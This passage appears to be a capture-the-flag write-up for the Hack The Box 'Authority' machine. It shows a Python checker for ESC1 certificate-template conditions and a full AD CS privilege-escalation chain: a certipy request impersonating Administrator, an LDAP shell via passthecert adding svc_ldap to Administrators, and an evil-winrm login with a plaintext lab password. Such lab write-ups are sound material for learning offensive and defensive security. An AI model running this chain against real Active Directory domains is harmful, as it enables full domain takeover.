AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Object Control Permissions
Owner : AUTHORITY.HTB\Administrator
Write Owner Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Dacl Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

We find an ESC1 vulnerability. A quick search for how to exploit it turns up an article explaining it, and we follow the same recipe.

First, using the information above, request a certificate carrying the Administrator identity.
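The rule behind that ESC1 line, written out over the CorpVPN fields listed above as an added example (my code, not Certipy's): the template is dangerous only when all five conditions hold at once, and the hardened copies show that reversing any single one of them, or dropping Domain Computers from the enrollment rights, clears the finding. The low-privilege group list and the logon EKU names are my assumptions.

```python
# Template fields transcribed from the CorpVPN entry in the certipy text output above.
CORP_VPN = {
    "name": "CorpVPN",
    "enabled": True,
    "any_purpose": False,
    "enrollee_supplies_subject": True,
    "requires_manager_approval": False,
    "authorized_signatures_required": 0,
    "extended_key_usage": [
        "Encrypting File System", "Secure Email", "Client Authentication",
        "Document Signing", "IP security IKE intermediate", "IP security use",
        "KDC Authentication",
    ],
    "enrollment_rights": [
        "AUTHORITY.HTB\\Domain Computers",
        "AUTHORITY.HTB\\Domain Admins",
        "AUTHORITY.HTB\\Enterprise Admins",
    ],
}

# Assumptions: which principals count as "anyone in the domain", and which EKUs
# let a certificate be used to log on (PKINIT / Schannel).
LOW_PRIV_GROUPS = {"domain users", "domain computers", "authenticated users",
                   "everyone", "users"}
LOGON_EKUS = {"client authentication", "pkinit client authentication",
              "smart card logon", "any purpose"}


def low_privileged(principal):
    """'AUTHORITY.HTB\\Domain Computers' -> True; 'AUTHORITY.HTB\\Domain Admins' -> False."""
    return principal.rsplit("\\", 1)[-1].lower() in LOW_PRIV_GROUPS


def allows_logon(template):
    """No EKU at all, Any Purpose, or a logon EKU all yield certificates usable for auth."""
    ekus = {e.lower() for e in template["extended_key_usage"]}
    return template["any_purpose"] or not ekus or bool(ekus & LOGON_EKUS)


def esc1_findings(template):
    """Return the low-privileged principals that can abuse the template via ESC1, or [].

    All of these must hold together: the template is enabled, the enrollee supplies
    the subject (so a UPN of the requester's choosing lands in the SAN), no manager
    approval, no co-signature requirement, and an EKU that permits authentication.
    The enrollment ACL then decides who gets to use it.
    """
    if not template["enabled"]:
        return []
    if not template["enrollee_supplies_subject"]:
        return []
    if template["requires_manager_approval"]:
        return []
    if template["authorized_signatures_required"] > 0:
        return []
    if not allows_logon(template):
        return []
    return [p for p in template["enrollment_rights"] if low_privileged(p)]


def hardened(template, **changes):
    """Copy of a template with the given fields changed, to test one fix at a time."""
    fixed = dict(template)
    fixed.update(changes)
    return fixed


if __name__ == "__main__":
    print("CorpVPN as found:", esc1_findings(CORP_VPN))
    print("with manager approval:",
          esc1_findings(hardened(CORP_VPN, requires_manager_approval=True)))
    print("with CA-supplied subject:",
          esc1_findings(hardened(CORP_VPN, enrollee_supplies_subject=False)))
```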

$ certipy req -u 'exp$' -p 'Exp114514' -target 10.10.11.222 -ca AUTHORITY-CA -template 'CorpVPN' -upn 'Administrator'
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Here -upn specifies the User Principal Name to place in the certificate.

Then we split the resulting .pfx file into the certificate and the private key.

$ certipy cert -pfx administrator.pfx -nokey -out user.crt
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Writing certificate and to 'user.crt'

$ certipy cert -pfx administrator.pfx -nocert -out user.key
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Writing private key to 'user.key'

We can use the passthecert tool to open an LDAP shell with the certificate and perform administrative (privilege-escalation) operations.

$ python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.10.11.222
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Type help for list of commands

# add_user_to_group svc_ldap Administrators
Adding user: svc_ldap to group Administrators result: OK

# exit
Bye!

We add the svc_ldap user to the Administrators group.

If we check the user's group memberships right away, it looks as though the user was not added to the group; that's because the change hasn't taken effect in the current session yet. Just log out and log back in.

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami /user

USER INFORMATION
----------------

User Name SID
============ =============================================
htb\svc_ldap S-1-5-21-622327497-3269355298-2248959698-1601
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> net user svc_ldap
User name svc_ldap
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 8/10/2022 9:29:31 PM
Password expires Never
Password changeable 8/11/2022 9:29:31 PM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/5/2023 8:43:09 PM

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.

$ evil-winrm -i 10.10.11.222 -u svc_ldap -p lDaP_1n_th3_cle4r!

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> net user svc_ldap
User name svc_ldap
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 8/10/2022 9:29:31 PM
Password expires Never
Password changeable 8/11/2022 9:29:31 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/5/2023 8:43:09 PM

Logon hours allowed All

Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.

Now we can grab the root flag.

*Evil-WinRM* PS C:\Users\Administrator> dir


Directory: C:\Users\Administrator


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/10/2022 8:52 PM .pwm-workpath
d-r--- 7/12/2023 1:21 PM 3D Objects
d-r--- 7/12/2023 1:21 PM Contacts
d-r--- 7/12/2023 1:21 PM Desktop
d-r--- 7/12/2023 1:21 PM Documents
d-r--- 7/12/2023 1:21 PM Downloads
d-r--- 7/12/2023 1:21 PM Favorites
d-r--- 7/12/2023 1:21 PM Links
d-r--- 7/12/2023 1:21 PM Music
d-r--- 7/12/2023 1:21 PM Pictures
d-r--- 7/12/2023 1:21 PM Saved Games
d-r--- 7/12/2023 1:21 PM Searches
d-r--- 7/12/2023 1:21 PM Videos
-a---- 3/17/2023 9:30 AM 16384 gp.jfm


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/25/2023 9:44 AM 34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

Rooted.

Summary

This box mainly tested understanding of LDAP; I learned a lot.